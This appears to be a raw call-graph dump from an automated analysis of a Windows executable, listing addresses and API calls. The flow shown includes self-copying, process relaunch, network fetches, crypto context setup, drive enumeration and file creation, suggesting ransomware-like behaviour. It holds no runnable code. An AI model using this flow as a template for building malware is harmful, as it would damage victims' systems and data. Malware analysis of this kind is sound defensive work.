38953->38950 38953->38952 38954 bb0c79 38953->38954 38958 bb0cc7 38953->38958 38969 bb793d DecodePointer 38953->38969 38954->38953 38964 bb7f51 58 API calls 2 library calls 38954->38964 38965 bb7fae 58 API calls 7 library calls 38954->38965 38966 bb7b0b 38954->38966 38959 bb5208 __woutput_s_l 57 API calls 38958->38959 38959->38960 38960->38936 38961->38936 38962->38940 38963->38942 38964->38954 38965->38954 38974 bb7ad7 GetModuleHandleExW 38966->38974 38969->38953 38978 bb501f GetLastError 38970->38978 38972 bb520d 38972->38958 38973->38947 38975 bb7af0 GetProcAddress 38974->38975 38976 bb7b07 ExitProcess 38974->38976 38975->38976 38977 bb7b02 38975->38977 38977->38976 38992 bc2534 38978->38992 38980 bb5034 38981 bb5082 SetLastError 38980->38981 38995 bb8c96 38980->38995 38981->38972 38985 bb505b 38986 bb5079 38985->38986 38987 bb5061 38985->38987 39003 bb0bed 38986->39003 39002 bb508e 58 API calls 4 library calls 38987->39002 38990 bb5069 GetCurrentThreadId 38990->38981 38991 bb507f 38991->38981 38993 bc254b TlsGetValue 38992->38993 38994 bc2547 38992->38994 38993->38980 38994->38980 38998 bb8c9d 38995->38998 38997 bb5047 38997->38981 39001 bc2553 TlsSetValue 38997->39001 38998->38997 39000 bb8cbb 38998->39000 39009 bcb813 38998->39009 39000->38997 39000->38998 39017 bc29c9 Sleep 39000->39017 39001->38985 39002->38990 39004 bb0c1f _rand_s 39003->39004 39005 bb0bf6 RtlFreeHeap 39003->39005 39004->38991 39005->39004 39006 bb0c0b 39005->39006 39007 bb5208 __woutput_s_l 56 API calls 39006->39007 39008 bb0c11 GetLastError 39007->39008 39008->39004 39010 bcb81e 39009->39010 39014 bcb839 39009->39014 39011 bcb82a 39010->39011 39010->39014 39013 bb5208 __woutput_s_l 57 API calls 39011->39013 39012 bcb849 HeapAlloc 39012->39014 39015 bcb82f 39012->39015 39013->39015 39014->39012 39014->39015 39018 bb793d DecodePointer 39014->39018 39015->38998 39017->39000 39018->39014 39020 bb18bc __alloc_osfhnd 39019->39020 39027 bb7dfc 39020->39027 39026 bb18e3 __alloc_osfhnd 39026->38932 39044 bb8af7 39027->39044 39029 bb18c5 39030 bb18f4 DecodePointer DecodePointer 39029->39030 39031 bb18d1 39030->39031 39032 bb1921 39030->39032 39041 bb18ee 39031->39041 39032->39031 39087 bba78d 59 API calls __woutput_s_l 39032->39087 39034 bb1984 EncodePointer EncodePointer 39034->39031 39035 bb1958 39035->39031 39039 bb1972 EncodePointer 39035->39039 39089 bb8d25 61 API calls __realloc_crt 39035->39089 39036 bb1933 39036->39034 39036->39035 39088 bb8d25 61 API calls __realloc_crt 39036->39088 39039->39034 39040 bb196c 39040->39031 39040->39039 39090 bb7e05 39041->39090 39045 bb8b1b EnterCriticalSection 39044->39045 39046 bb8b08 39044->39046 39045->39029 39051 bb8b9f 39046->39051 39048 bb8b0e 39048->39045 39075 bb7c2e 58 API calls 3 library calls 39048->39075 39052 bb8bab __alloc_osfhnd 39051->39052 39053 bb8bcc 39052->39053 39054 bb8bb4 39052->39054 39066 bb8bed __alloc_osfhnd 39053->39066 39078 bb8cde 39053->39078 39076 bb7f51 58 API calls 2 library calls 39054->39076 39056 bb8bb9 39077 bb7fae 58 API calls 7 library calls 39056->39077 39060 bb8bc0 39064 bb7b0b __mtinitlocknum 3 API calls 39060->39064 39061 bb8be8 39065 bb5208 __woutput_s_l 58 API calls 39061->39065 39062 bb8bf7 39063 bb8af7 __lock 58 API calls 39062->39063 39067 bb8bfe 39063->39067 39068 bb8bca 39064->39068 39065->39066 39066->39048 39069 bb8c0b 39067->39069 39070 bb8c23 39067->39070 39068->39053 39084 bc263e InitializeCriticalSectionAndSpinCount 39069->39084 39072 bb0bed _free 58 API calls 39070->39072 39073 bb8c17 39072->39073 39085 bb8c3f LeaveCriticalSection _doexit 39073->39085 39076->39056 39077->39060 39079 bb8cec 39078->39079 39080 bb0c62 _malloc 58 API calls 39079->39080 39081 bb8be1 39079->39081 39083 bb8cff 39079->39083 39080->39079 39081->39061 39081->39062 39083->39079 39083->39081 39086 bc29c9 Sleep 39083->39086 39084->39073 39085->39066 39086->39083 39087->39036 39088->39035 39089->39040 39093 bb8c81 LeaveCriticalSection 39090->39093 39092 bb18f3 39092->39026 39093->39092 39094 babae0 39095 babb13 39094->39095 39096 babba0 39094->39096 39099 babb54 39095->39099 39100 babb15 39095->39100 39097 babf3d 39096->39097 39098 babbad 39096->39098 39107 babf9a DefWindowProcW 39097->39107 39108 babf65 IsWindow 39097->39108 39102 babbb0 DefWindowProcW 39098->39102 39103 babbd7 39098->39103 39101 babb70 39099->39101 39106 babb75 DefWindowProcW 39099->39106 39104 babb1c 39100->39104 39105 babb47 PostQuitMessage 39100->39105 39109 bb0c62 _malloc 58 API calls 39103->39109 39104->39101 39104->39102 39112 babb2e 39104->39112 39105->39101 39108->39101 39110 babf73 DestroyWindow 39108->39110 39111 babbe9 GetComputerNameW 39109->39111 39110->39101 39170 ba3100 39111->39170 39112->39101 39133 ba1cd0 39112->39133 39114 babc26 39177 bace80 59 API calls _memmove 39114->39177 39117 babb3f 39117->39108 39118 babc3a 39119 bb0bed _free 58 API calls 39118->39119 39132 babcdc 39119->39132 39120 babefb IsWindow 39121 babf28 39120->39121 39122 babf11 39120->39122 39121->39101 39122->39121 39123 babf1a DestroyWindow 39122->39123 39123->39121 39124 babef7 39124->39120 39124->39121 39125 ba4690 59 API calls 39125->39132 39131 babe8f CreateThread 39131->39132 39132->39120 39132->39124 39132->39125 39132->39131 39178 b9eff0 65 API calls 39132->39178 39179 bac330 39132->39179 39185 bac240 39132->39185 39191 bab8b0 39132->39191 39213 bace80 59 API calls _memmove 39132->39213 39134 bbf7c0 __write_nolock 39133->39134 39135 ba1cf2 RegOpenKeyExW 39134->39135 39136 ba1d20 _memset 39135->39136 39137 ba1e6a 39135->39137 39138 ba1d40 RegQueryValueExW RegCloseKey 39136->39138 39137->39117 39139 ba1d8f 39138->39139 39139->39139 39214 ba5c10 39139->39214 39141 ba1dbf 39142 ba1e7c 39141->39142 39143 ba1dd1 lstrlenA 39141->39143 39144 ba1e89 39142->39144 39145 ba1e94 6 API calls 39142->39145 39229 ba3520 39143->39229 39144->39145 39147 ba1ef5 UuidCreate UuidToStringW 39145->39147 39149 ba1f36 39147->39149 39148 ba1e3c PathFileExistsW 39148->39142 39150 ba1e52 39148->39150 39152 ba5c10 59 API calls 39149->39152 39150->39137 39232 ba4690 39150->39232 39151 ba1df1 39151->39148 39153 ba1f59 RpcStringFreeW PathAppendW CreateDirectoryW 39152->39153 39155 ba1f98 39153->39155 39157 ba1fce 39153->39157 39156 ba5c10 59 API calls 39155->39156 39156->39157 39158 ba5c10 59 API calls 39157->39158 39159 ba201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 39158->39159 39160 ba21d1 39159->39160 39161 ba207c _memset 39159->39161 39160->39137 39162 ba2095 6 API calls 39161->39162 39163 ba2109 39162->39163 39164 ba2115 _memset 39162->39164 39255 ba3260 39163->39255 39166 ba2125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 39164->39166 39167 ba21aa GetLastError 39166->39167 39168 ba21b2 39166->39168 39167->39160 39169 ba21c0 WaitForSingleObject 39168->39169 39169->39160 39169->39169 39171 ba3133 39170->39171 39172 ba3121 39170->39172 39175 ba5c10 59 API calls 39171->39175 39173 ba5c10 59 API calls 39172->39173 39174 ba312c 39173->39174 39174->39114 39176 ba3159 39175->39176 39176->39114 39177->39118 39178->39132 39282 bad3c0 39179->39282 39182 bac35b 39182->39132 39183 bdf23e 59 API calls 39184 bac37a 39183->39184 39184->39132 39292 bad340 39185->39292 39188 bac26b 39188->39132 39189 bdf23e 59 API calls 39190 bac28a 39189->39190 39190->39132 39192 bab8d6 39191->39192 39194 bab8e0 39191->39194 39193 ba4690 59 API calls 39192->39193 39193->39194 39195 bab916 39194->39195 39196 ba4690 59 API calls 39194->39196 39197 bab930 39195->39197 39198 ba4690 59 API calls 39195->39198 39196->39195 39199 bab94a 39197->39199 39200 ba4690 59 API calls 39197->39200 39198->39197 39201 bab964 39199->39201 39202 ba4690 59 API calls 39199->39202 39200->39199 39298 babfd0 39201->39298 39202->39201 39204 bab976 39205 babfd0 59 API calls 39204->39205 39206 bab988 39205->39206 39207 babfd0 59 API calls 39206->39207 39208 bab99a 39207->39208 39209 bab9b4 39208->39209 39210 ba4690 59 API calls 39208->39210 39211 bab9f2 39209->39211 39310 ba3ff0 39209->39310 39210->39209 39211->39132 39213->39132 39215 ba5c66 39214->39215 39221 ba5c1e 39214->39221 39216 ba5cff 39215->39216 39217 ba5c76 39215->39217 39271 bdf23e 39216->39271 39218 ba5c88 ___check_float_string 39217->39218 39262 ba6950 39217->39262 39218->39141 39221->39215 39225 ba5c45 39221->39225 39227 ba4690 59 API calls 39225->39227 39228 ba5c60 39227->39228 39228->39141 39230 ba4690 59 API calls 39229->39230 39231 ba3550 39230->39231 39231->39151 39233 ba46a9 39232->39233 39234 ba478c 39232->39234 39236 ba46e9 39233->39236 39237 ba46b6 39233->39237 39280 bdf26c 59 API calls 3 library calls 39234->39280 39240 ba47a0 39236->39240 39241 ba46f5 39236->39241 39238 ba4796 39237->39238 39239 ba46c2 39237->39239 39281 bdf26c 59 API calls 3 library calls 39238->39281 39279 ba3340 59 API calls _memmove 39239->39279 39243 bdf23e 59 API calls 39240->39243 39245 ba6950 59 API calls 39241->39245 39253 ba4707 ___check_float_string 39241->39253 39244 ba47aa 39243->39244 39246 ba47bf 39244->39246 39247 ba47cd 39244->39247 39245->39253 39249 ba5c10 59 API calls 39246->39249 39252 ba5c10 59 API calls 39247->39252 39251 ba47c8 39249->39251 39250 ba46e0 39250->39137 39251->39137 39254 ba47ec 39252->39254 39253->39137 39254->39137 39256 ba326f 39255->39256 39257 ba327d 39255->39257 39258 ba5c10 59 API calls 39256->39258 39260 ba5c10 59 API calls 39257->39260 39259 ba3278 39258->39259 39259->39164 39261 ba329c 39260->39261 39261->39164 39263 ba6986 39262->39263 39264 ba69d3 39263->39264 39265 bb3b4c 59 API calls 39263->39265 39267 ba6a0d ___check_float_string 39263->39267 39264->39267 39276 bdf1bb 59 API calls 3 library calls 39264->39276 39265->39264 39267->39218 39277 bc0cfc 58 API calls std::exception::_Copy_str 39271->39277 39273 bdf256 39278 bc0eca RaiseException 39273->39278 39275 bdf26b 39277->39273 39278->39275 39279->39250 39280->39238 39281->39240 39285 baccc0 39282->39285 39286 bb3b4c 59 API calls 39285->39286 39287 baccca 39286->39287 39288 bac347 39287->39288 39291 bdf1bb 59 API calls 3 library calls 39287->39291 39288->39182 39288->39183 39293 bacc50 59 API calls 39292->39293 39294 bad36c 39293->39294 39295 bac257 39294->39295 39297 bad740 59 API calls 39294->39297 39295->39188 39295->39189 39297->39295 39299 bac001 39298->39299 39305 bac00a 39298->39305 39300 bac04c 39299->39300 39301 bac083 39299->39301 39299->39305 39337 bacf30 39300->39337 39302 bac09e 39301->39302 39308 bac0e1 39301->39308 39304 bacf30 59 API calls 39302->39304 39307 bac0b2 39304->39307 39305->39204 39307->39305 39341 bad5b0 39307->39341 39345 bac540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 39308->39345 39311 ba4009 39310->39311 39312 ba40f2 39310->39312 39314 ba405d 39311->39314 39315 ba4016 39311->39315 39357 bdf26c 59 API calls 3 library calls 39312->39357 39316 ba4106 39314->39316 39319 ba4066 39314->39319 39317 ba40fc 39315->39317 39318 ba4022 39315->39318 39323 bdf23e 59 API calls 39316->39323 39358 bdf26c 59 API calls 3 library calls 39317->39358 39321 ba402b 39318->39321 39322 ba4044 39318->39322 39333 ba4078 ___check_float_string 39319->39333 39348 ba6760 39319->39348 39346 ba2e80 59 API calls _memmove 39321->39346 39347 ba2e80 59 API calls _memmove 39322->39347 39327 ba4110 39323->39327 39330 ba413a 39327->39330 39331 ba412c 39327->39331 39328 ba4054 39328->39211 39329 ba403b 39329->39211 39335 ba56d0 59 API calls 39330->39335 39359 ba56d0 39331->39359 39333->39211 39334 ba4135 39334->39211 39336 ba4151 39335->39336 39336->39211 39338 bacf5b 39337->39338 39339 bacf41 39337->39339 39338->39305 39339->39338 39340 ba4690 59 API calls 39339->39340 39340->39339 39342 bad5e2 39341->39342 39343 bad63e 39342->39343 39344 ba4690 59 API calls 39342->39344 39343->39305 39344->39342 39345->39307 39346->39329 39347->39328 39351 ba6793 39348->39351 39349 ba6817 ___check_float_string 39349->39333 39350 ba67dc 39350->39349 39378 bdf1bb 59 API calls 3 library calls 39350->39378 39351->39349 39351->39350 39352 bb3b4c 59 API calls 39351->39352 39352->39350 39357->39317 39358->39316 39360 ba5735 39359->39360 39366 ba56de 39359->39366 39361 ba57bc 39360->39361 39362 ba573e 39360->39362 39363 bdf23e 59 API calls 39361->39363 39364 ba6760 59 API calls 39362->39364 39369 ba5750 ___check_float_string 39362->39369 39365 ba57c6 39363->39365 39364->39369 39367 ba57db 39365->39367 39379 bdf26c 59 API calls 3 library calls 39365->39379 39366->39360 39371 ba5704 39366->39371 39367->39334 39369->39334 39370 ba5806 39372 ba5709 39371->39372 39373 ba571f 39371->39373 39374 ba3ff0 59 API calls 39372->39374 39375 ba3ff0 59 API calls 39373->39375 39376 ba5719 39374->39376 39377 ba572f 39375->39377 39376->39334 39377->39334 39379->39370 39380 be4c30 39382 bb0c62 58 API calls 39380->39382 39381 be4c3a 39382->39381 39383 bb3f84 39384 bb3f90 __alloc_osfhnd 39383->39384 39420 bc2603 GetStartupInfoW 39384->39420 39386 bb3f95 39422 bb78d5 GetProcessHeap 39386->39422 39388 bb3fed 39389 bb3ff8 39388->39389 39751 bb411a 58 API calls 3 library calls 39388->39751 39423 bb5141 39389->39423 39392 bb3ffe 39393 bb4009 __RTC_Initialize 39392->39393 39752 bb411a 58 API calls 3 library calls 39392->39752 39444 bb8754 39393->39444 39396 bb4018 39397 bb4024 GetCommandLineW 39396->39397 39753 bb411a 58 API calls 3 library calls 39396->39753 39463 bc235f GetEnvironmentStringsW 39397->39463 39400 bb4023 39400->39397 39403 bb403e 39404 bb4049 39403->39404 39754 bb7c2e 58 API calls 3 library calls 39403->39754 39473 bc21a1 39404->39473 39408 bb405a 39487 bb7c68 39408->39487 39411 bb4062 39412 bb406d __wwincmdln 39411->39412 39756 bb7c2e 58 API calls 3 library calls 39411->39756 39493 ba9f90 39412->39493 39415 bb4081 39416 bb4090 39415->39416 39748 bb7f3d 39415->39748 39757 bb7c59 58 API calls _doexit 39416->39757 39419 bb4095 __alloc_osfhnd 39421 bc2619 39420->39421 39421->39386 39422->39388 39758 bb7d6c 36 API calls 2 library calls 39423->39758 39425 bb5146 39759 bb8c48 InitializeCriticalSectionAndSpinCount __alloc_osfhnd 39425->39759 39427 bb514f 39760 bb51b7 61 API calls 2 library calls 39427->39760 39428 bb514b 39428->39427 39761 bc24f7 TlsAlloc 39428->39761 39431 bb5161 39431->39427 39433 bb516c 39431->39433 39432 bb5154 39432->39392 39434 bb8c96 __calloc_crt 58 API calls 39433->39434 39435 bb5179 39434->39435 39436 bb51ae 39435->39436 39762 bc2553 TlsSetValue 39435->39762 39764 bb51b7 61 API calls 2 library calls 39436->39764 39439 bb518d 39439->39436 39441 bb5193 39439->39441 39440 bb51b3 39440->39392 39763 bb508e 58 API calls 4 library calls 39441->39763 39443 bb519b GetCurrentThreadId 39443->39392 39445 bb8760 __alloc_osfhnd 39444->39445 39446 bb8af7 __lock 58 API calls 39445->39446 39447 bb8767 39446->39447 39448 bb8c96 __calloc_crt 58 API calls 39447->39448 39450 bb8778 39448->39450 39449 bb87e3 GetStartupInfoW 39451 bb87f8 39449->39451 39458 bb8927 39449->39458 39450->39449 39452 bb8783 __alloc_osfhnd @_EH4_CallFilterFunc@8 39450->39452 39455 bb8c96 __calloc_crt 58 API calls 39451->39455 39451->39458 39460 bb8846 39451->39460 39452->39396 39453 bb89ef 39767 bb89ff LeaveCriticalSection _doexit 39453->39767 39455->39451 39456 bb8974 GetStdHandle 39456->39458 39457 bb8987 GetFileType 39457->39458 39458->39453 39458->39456 39458->39457 39766 bc263e InitializeCriticalSectionAndSpinCount 39458->39766 39459 bb887a GetFileType 39459->39460 39460->39458 39460->39459 39765 bc263e InitializeCriticalSectionAndSpinCount 39460->39765 39464 bb4034 39463->39464 39465 bc2370 39463->39465 39469 bc1f64 GetModuleFileNameW 39464->39469 39466 bb8cde __malloc_crt 58 API calls 39465->39466 39467 bc2396 ___check_float_string 39466->39467 39468 bc23ac FreeEnvironmentStringsW 39467->39468 39468->39464 39470 bc1f98 _wparse_cmdline 39469->39470 39471 bb8cde __malloc_crt 58 API calls 39470->39471 39472 bc1fd8 _wparse_cmdline 39470->39472 39471->39472 39472->39403 39474 bc21ba __wsetenvp 39473->39474 39478 bb404f 39473->39478 39475 bb8c96 __calloc_crt 58 API calls 39474->39475 39483 bc21e3 __wsetenvp 39475->39483 39476 bc223a 39477 bb0bed _free 58 API calls 39476->39477 39477->39478 39478->39408 39755 bb7c2e 58 API calls 3 library calls 39478->39755 39479 bb8c96 __calloc_crt 58 API calls 39479->39483 39480 bc225f 39482 bb0bed _free 58 API calls 39480->39482 39482->39478 39483->39476 39483->39478 39483->39479 39483->39480 39484 bc2276 39483->39484 39768 bb962f 58 API calls __woutput_s_l 39483->39768 39769 bb42fd 8 API calls 2 library calls 39484->39769 39486 bc2282 39488 bb7c74 __IsNonwritableInCurrentImage 39487->39488 39770 bcaeb5 39488->39770 39490 bb7c92 __initterm_e 39491 bb19ac __cinit 67 API calls 39490->39491 39492 bb7cb1 __cinit __IsNonwritableInCurrentImage 39490->39492 39491->39492 39492->39411 39494 ba9fa0 __write_nolock 39493->39494 39773 b9cf10 39494->39773 39496 ba9fb0 39497 ba9fc4 GetCurrentProcess GetLastError SetPriorityClass 39496->39497 39498 ba9fb4 39496->39498 39500 ba9fe6 39497->39500 39501 ba9fe4 GetLastError 39497->39501 40145 ba24e0 109 API calls _memset 39498->40145 39503 bad3c0 59 API calls 39500->39503 39501->39500 39502 ba9fb9 39502->39415 39504 baa00a 39503->39504 39505 bab669 39504->39505 39506 baa022 39504->39506 39507 bdf23e 59 API calls 39505->39507 39510 bad340 59 API calls 39506->39510 39508 bab673 39507->39508 39509 bdf23e 59 API calls 39508->39509 39511 bab67d 39509->39511 39512 baa04d 39510->39512 39512->39508 39513 baa065 39512->39513 39787 ba3a90 39513->39787 39517 baa159 GetCommandLineW CommandLineToArgvW lstrcpyW 39518 baa33d GlobalFree 39517->39518 39533 baa196 39517->39533 39519 baa45c 39518->39519 39520 baa354 39518->39520 39523 ba2220 76 API calls 39519->39523 39803 ba2220 39520->39803 39521 baa100 39521->39517 39524 baa359 39523->39524 39526 baa466 39524->39526 39818 b9ef50 39524->39818 39525 baa1cc lstrcmpW lstrcmpW 39525->39533 39526->39415 39527 bb0235 60 API calls ___get_qualified_locale 39527->39533 39529 baa24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 39529->39533 39530 baa48f 39532 baa4ef 39530->39532 39823 ba3ea0 39530->39823 39534 ba1cd0 92 API calls 39532->39534 39533->39518 39533->39525 39533->39527 39533->39529 39535 baa361 39533->39535 39536 baa563 39534->39536 40146 bb3c92 59 API calls ___get_qualified_locale_downlevel 39535->40146 39543 ba4690 59 API calls 39536->39543 39571 baa5db 39536->39571 39538 baa36e lstrcpyW lstrcpyW 39539 baa395 OpenProcess 39538->39539 39540 baa3a9 WaitForSingleObject CloseHandle 39539->39540 39541 baa402 39539->39541 39540->39541 39544 baa3cb 39540->39544 39547 ba1cd0 92 API calls 39541->39547 39542 baa6f9 40152 ba1a10 8 API calls 39542->40152 39546 baa5a9 39543->39546 39561 baa3e2 GlobalFree 39544->39561 39562 baa3d4 Sleep 39544->39562 40147 ba1ab0 PeekMessageW 39544->40147 39545 baa6fe 39549 baa70f 39545->39549 39550 baa8b6 CreateMutexA 39545->39550 39553 ba4690 59 API calls 39546->39553 39554 baa40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 39547->39554 39555 baa7d0 39549->39555 39566 b9ef50 58 API calls 39549->39566 39556 baa8ca 39550->39556 39552 baa618 39552->39550 39557 baa624 GetVersion 39552->39557 39558 baa5d4 39553->39558 39559 baa451 39554->39559 39563 b9ef50 58 API calls 39555->39563 39560 b9ef50 58 API calls 39556->39560 39557->39542 39564 baa632 lstrcpyW lstrcatW lstrcatW 39557->39564 39844 b9d240 CoInitialize 39558->39844 39559->39415 39574 baa8da 39560->39574 39567 baa3f7 39561->39567 39562->39539 39568 baa7ec 39563->39568 39569 baa674 _memset 39564->39569 39577 baa72f 39566->39577 39567->39415 39570 baa7f1 lstrlenA 39568->39570 39573 baa6b4 ShellExecuteExW 39569->39573 39572 bb0c62 _malloc 58 API calls 39570->39572 39571->39542 39571->39545 39571->39552 39575 baa810 _memset 39572->39575 39573->39545 39576 baa6e3 39573->39576 39578 ba3ea0 59 API calls 39574->39578 39587 baa92f 39574->39587 39580 baa81e MultiByteToWideChar lstrcatW 39575->39580 39719 baa9d1 39576->39719 39579 ba3ea0 59 API calls 39577->39579 39582 baa780 39577->39582 39578->39574 39579->39577 39580->39570 39581 baa847 lstrlenW 39580->39581 39583 baa8a0 CreateMutexA 39581->39583 39584 baa856 39581->39584 39585 baa79c CreateThread 39582->39585 39589 ba3ff0 59 API calls 39582->39589 39583->39556 39926 b9e760 39584->39926 39585->39555 41376 badbd0 39585->41376 39588 ba5c10 59 API calls 39587->39588 39591 baa98c 39588->39591 39589->39585 39590 baa860 CreateThread WaitForSingleObject 39590->39583 41307 bae690 39590->41307 39937 ba2840 39591->39937 39593 baa997 39942 ba0fc0 CryptAcquireContextW 39593->39942 39595 baa9ab 39596 baa9c2 lstrlenA 39595->39596 39597 baa9d8 39596->39597 39596->39719 39598 ba5c10 59 API calls 39597->39598 39599 baaa23 39598->39599 39600 ba2840 60 API calls 39599->39600 39601 baaa2e lstrcpyA 39600->39601 39603 baaa4b 39601->39603 39603->39603 39604 ba5c10 59 API calls 39603->39604 39605 baaa90 39604->39605 39606 b9ef50 58 API calls 39605->39606 39607 baaaa0 39606->39607 39608 ba3ea0 59 API calls 39607->39608 39609 baaaf5 39607->39609 39608->39607 39610 ba3ff0 59 API calls 39609->39610 39611 baab1d 39610->39611 39965 ba2900 39611->39965 39613 b9ef50 58 API calls 39615 baabc5 39613->39615 39614 baab28 _memmove 39614->39613 39616 ba3ea0 59 API calls 39615->39616 39617 baac1e 39615->39617 39616->39615 39618 ba3ff0 59 API calls 39617->39618 39619 baac46 39618->39619 39620 ba2900 60 API calls 39619->39620 39622 baac51 _memmove 39620->39622 39621 b9ef50 58 API calls 39623 baacee 39621->39623 39622->39621 39624 ba3ea0 59 API calls 39623->39624 39625 baad43 39623->39625 39624->39623 39626 ba3ff0 59 API calls 39625->39626 39627 baad6b 39626->39627 39628 ba2900 60 API calls 39627->39628 39631 baad76 _memmove 39628->39631 39629 ba5c10 59 API calls 39630 baae2a 39629->39630 39970 ba3580 39630->39970 39631->39629 39633 baae3c 39634 ba5c10 59 API calls 39633->39634 39635 baae76 39634->39635 39636 ba3580 59 API calls 39635->39636 39637 baae82 39636->39637 39638 ba5c10 59 API calls 39637->39638 39639 baaebc 39638->39639 39640 ba3580 59 API calls 39639->39640 39641 baaec8 39640->39641 39642 ba5c10 59 API calls 39641->39642 39643 baaf02 39642->39643 39644 ba3580 59 API calls 39643->39644 39645 baaf0e 39644->39645 39646 ba5c10 59 API calls 39645->39646 39647 baaf48 39646->39647 39648 ba3580 59 API calls 39647->39648 39649 baaf54 39648->39649 39650 ba5c10 59 API calls 39649->39650 39651 baaf8e 39650->39651 39652 ba3580 59 API calls 39651->39652 39653 baaf9a 39652->39653 39654 ba5c10 59 API calls 39653->39654 39655 baafd4 39654->39655 39656 ba3580 59 API calls 39655->39656 39657 baafe0 39656->39657 39658 ba3100 59 API calls 39657->39658 39659 bab001 39658->39659 39660 ba3580 59 API calls 39659->39660 39661 bab025 39660->39661 39662 ba3100 59 API calls 39661->39662 39663 bab03c 39662->39663 39664 ba3580 59 API calls 39663->39664 39665 bab059 39664->39665 39666 ba3100 59 API calls 39665->39666 39667 bab070 39666->39667 39668 ba3580 59 API calls 39667->39668 39669 bab07c 39668->39669 39670 ba3100 59 API calls 39669->39670 39671 bab093 39670->39671 39672 ba3580 59 API calls 39671->39672 39673 bab09f 39672->39673 39674 ba3100 59 API calls 39673->39674 39675 bab0b6 39674->39675 39676 ba3580 59 API calls 39675->39676 39677 bab0c2 39676->39677 39678 ba3100 59 API calls 39677->39678 39679 bab0d9 39678->39679 39680 ba3580 59 API calls 39679->39680 39681 bab0e5 39680->39681 39682 ba3100 59 API calls 39681->39682 39683 bab0fc 39682->39683 39684 ba3580 59 API calls 39683->39684 39685 bab108 39684->39685 39687 bab130 39685->39687 40153 bacdd0 59 API calls 39685->40153 39688 b9ef50 58 API calls 39687->39688 39689 bab16e 39688->39689 39691 bab1a5 GetUserNameW 39689->39691 39977 ba2de0 39689->39977 39692 bab1c9 39691->39692 39984 ba2c40 39692->39984 39694 bab1d8 39991 ba2bf0 39694->39991 39698 bab2f5 40002 ba36c0 39698->40002 39702 bab311 40018 ba30b0 39702->40018 39704 ba2c40 59 API calls 39720 bab1f3 39704->39720 39707 ba2900 60 API calls 39707->39720 39708 bab327 40044 ba11c0 CreateFileW 39708->40044 39709 ba3580 59 API calls 39709->39720 39711 bab33b 40129 baba10 LoadCursorW RegisterClassExW 39711->40129 39713 bab343 40130 baba80 CreateWindowExW 39713->40130 39714 ba3100 59 API calls 39714->39720 39716 bab34b 39716->39719 40133 ba0a50 GetLogicalDrives 39716->40133 39719->39415 39720->39698 39720->39704 39720->39707 39720->39709 39720->39714 40154 b9f1f0 59 API calls 39720->40154 39721 bab379 39722 ba3100 59 API calls 39721->39722 39723 bab3a5 39722->39723 39724 ba3580 59 API calls 39723->39724 39747 bab3b3 39724->39747 39725 bab48b 40144 bafdc0 CreateThread 39725->40144 39727 bab49f GetMessageW 39728 bab4bf 39727->39728 39729 bab4ed 39727->39729 39731 bab4c5 TranslateMessage DispatchMessageW KiUserCallbackDispatcher 39728->39731 39732 bab55b 39729->39732 39733 bab502 PostThreadMessageW 39729->39733 39730 bac330 59 API calls 39730->39747 39731->39729 39731->39731 39735 bab5bb 39732->39735 39736 bab564 PostThreadMessageW 39732->39736 39734 bab510 PeekMessageW 39733->39734 39737 bab546 WaitForSingleObject 39734->39737 39738 bab526 DispatchMessageW PeekMessageW 39734->39738 39735->39719 39742 bab5d2 CloseHandle 39735->39742 39739 bab570 PeekMessageW 39736->39739 39737->39732 39737->39734 39738->39737 39738->39738 39740 bab5a6 WaitForSingleObject 39739->39740 39741 bab586 DispatchMessageW PeekMessageW 39739->39741 39740->39735 39740->39739 39741->39740 39741->39741 39742->39719 39743 bac240 59 API calls 39743->39747 39744 bab8b0 59 API calls 39744->39747 39745 ba3260 59 API calls 39745->39747 39747->39725 39747->39730 39747->39743 39747->39744 39747->39745 40143 bafa10 CreateThread 39747->40143 41553 bb7e0e 39748->41553 39750 bb7f4c 39750->39416 39751->39389 39752->39393 39753->39400 39757->39419 39758->39425 39759->39428 39760->39432 39761->39431 39762->39439 39763->39443 39764->39440 39765->39460 39766->39458 39767->39452 39768->39483 39769->39486 39771 bcaeb8 EncodePointer 39770->39771 39771->39771 39772 bcaed2 39771->39772 39772->39490 39774 b9cf32 _memset __write_nolock 39773->39774 39775 b9cf4f InternetOpenW 39774->39775 39776 ba5c10 59 API calls 39775->39776 39777 b9cf8a InternetOpenUrlW 39776->39777 39778 b9cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39777->39778 39786 b9cfb2 39777->39786 39779 ba56d0 59 API calls 39778->39779 39780 b9d000 39779->39780 39781 ba56d0 59 API calls 39780->39781 39782 b9d049 39781->39782 39782->39786 40155 ba3010 39782->40155 39784 b9d084 39785 ba3010 59 API calls 39784->39785 39784->39786 39785->39786 39786->39496 39788 ba3ab2 39787->39788 39794 ba3ad0 GetModuleFileNameW PathRemoveFileSpecW 39787->39794 39789 ba3aba 39788->39789 39790 ba3b00 39788->39790 39792 bb3b4c 59 API calls 39789->39792 39791 bdf23e 59 API calls 39790->39791 39793 ba3ac7 39791->39793 39792->39793 39793->39794 40158 bdf1bb 59 API calls 3 library calls 39793->40158 39797 ba8400 39794->39797 39798 ba8437 39797->39798 39802 ba8446 39797->39802 39798->39802 40159 ba5d50 39798->40159 39800 ba84b9 39800->39521 39802->39800 40169 ba8d50 59 API calls 39802->40169 39804 bbf7c0 __write_nolock 39803->39804 39805 ba222d 7 API calls 39804->39805 39806 ba228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39805->39806 39807 ba22bd K32EnumProcesses 39805->39807 39806->39807 39808 ba22df 39807->39808 39809 ba22d3 39807->39809 39810 ba2353 39808->39810 39811 ba22f0 OpenProcess 39808->39811 39809->39524 39810->39524 39812 ba230a K32EnumProcessModules 39811->39812 39813 ba2346 CloseHandle 39811->39813 39812->39813 39814 ba231c K32GetModuleBaseNameW 39812->39814 39813->39810 39813->39811 40170 bb0235 39814->40170 39816 ba233e 39816->39813 39817 ba2345 39816->39817 39817->39813 39819 bb0c62 _malloc 58 API calls 39818->39819 39820 b9ef6e _memset 39819->39820 39821 b9efdc 39820->39821 39822 bb0c62 _malloc 58 API calls 39820->39822 39821->39530 39822->39820 39824 ba3f05 39823->39824 39829 ba3eae 39823->39829 39825 ba3f18 39824->39825 39826 ba3fb1 39824->39826 39828 ba3fbb 39825->39828 39830 ba3f2d 39825->39830 39838 ba3f3d ___check_float_string 39825->39838 39827 bdf23e 59 API calls 39826->39827 39827->39828 